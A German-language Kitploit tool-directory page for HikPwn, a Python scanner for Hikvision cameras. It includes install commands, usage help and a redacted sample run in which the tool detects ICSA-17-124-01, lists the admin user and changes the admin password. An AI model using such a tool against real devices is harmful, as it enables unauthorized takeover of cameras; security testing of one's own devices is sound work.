Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
HikPwn — HikPwn, ein einfacher Scanner für Hikvision-Geräte mit grundlegenden Schwachstellen-Scanfunktionen, geschrieben in Python 3.8. | Kitploit
Tools/GitHubGitHub/4n4nk3/hikpwn
SchwachstellenscannerIoT-SicherheitNetzwerkkartierungExploitationInformationsbeschaffung
GitHub4n4nk3/hikpwn

HikPwn

HikPwn, ein einfacher Scanner für Hikvision-Geräte mit grundlegenden Schwachstellen-Scanfunktionen, geschrieben in Python 3.8.

Repository anzeigen
12734vor 4 JahrenVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

HikPwn

HikPwn, ein einfacher Scanner für Hikvision-Geräte mit grundlegenden Schwachstellen-Scan-Funktionen, geschrieben in Python 3.8. Dieses Projekt entstand aus Neugier, während ich Netzwerkverkehr analysierte, der von einigen Hikvision-Software und -Geräten erzeugt wurde.

Setup-Anleitung:

root@kitploit:~
git clone https://github.com/4n4nk3/HikPwn.git
cd HikPwn
pip install -r requirements.txt

Getestet auf:

  • Python 3.8 auf Linux 4.19 x86_64

Funktionen und Eigenschaften:

  • Passive Erkennung von Hikvision-Geräten.
  • Aktive Erkennung und Aufzählung von Hikvision-Geräten über UDP UPNP Sondierung.
  • Erkennungs- und Ausnutzungsmöglichkeiten für ICSA-17-124-01, die zu Administratorzugriff führen.
  • Aufzählungsdaten in './log.txt' speichern.

In Arbeit ... bleibt dran!

TODO:

  • Option hinzufügen, die Erkennung zu überspringen und nur eine bestimmte IP auf ICSA-17-124-01 zu scannen.
  • Testen mit weiteren Geräten.
  • Erkennungs- und Ausnutzungsmöglichkeit für CVE-2021-36260 hinzufügen.

Hilfe:

root@kitploit:~
usage: hikpwn.py [-h] --interface INTERFACE --address ADDRESS [--active]  [--ICSA_17_124_01]

HikPwn, a simple scanner for Hikvision devices with basic vulnerability scanning capabilities written in Python 3.8. by Ananke: https://github.com/4n4nk3.

optional arguments:
  -h, --help            show this help message and exit
  --interface INTERFACE the network interface to use
  --address ADDRESS     the ip address of the selected network interface
  --active              enable "active" discovery
  --ICSA_17_124_01      enable ICSA-17-124-01 detection on discovered devices

Zensierte Vorschau:

root@kitploit:~
Using eth0 as network interface and XXX.XXX.XXX.XXX as its IP address...

[*] Started 30 seconds of both passive and active discovery...

================================================================================
[*] Total detected devices: 1

	XXX.XXX.XXX.XX

================================================================================
[*] Active discovery's results:

DEVICE #1:
	LABEL                     DATA      
	--------------------------------------------------
	Serial Number             xxxxxxxxxxxxxxxxxxxxx
	Description               DS-2DE4220IW-D
	MAC                       XX:XX:XX:XX:XX:XX
	IP                        XXX.XXX.XXX.XX
	DHCP in use               false     
	Software Version          V5.4.3build 160810
	DSP Version               V7.3 build 160801
	Boot Time                 2019-03-01 00:05:33
	Activation Status         true      
	Password Reset Ability    true      


================================================================================
[*] Passive discovery's results:

DEVICE #1:
	Detected a device with ip address XXX.XXX.XXX.XX and MAC address XX:XX:XX:XX:XX:XX.


================================================================================
[*] Starting scan for ICSA-17-124-01...

Checking if XXX.XXX.XXX.XX is vulnerable to ICSA-17-124-01 and if we can get a list of valid users present on the device...
XXX.XXX.XXX.XX is vulnerable to ICSA_17_124_01. Recovered user list:
    user_id                   1
    user_name                 admin
    priority                  high
    user_level                Administrator

Do you want to exploit the vulnerability and try to change admin's password? (y/n)
    >>> y

Enter a password composed by numbers and letters (8-12 characters):
    >>> 

Password change successful.

Dieses Projekt dient ausschließlich Bildungszwecken. Verwenden Sie es nicht für illegale Aktivitäten. Ich unterstütze oder befürworte kein illegales oder unethisches Verhalten und kann nicht für möglichen Missbrauch dieser Software verantwortlich gemacht werden.

Tool herunterladen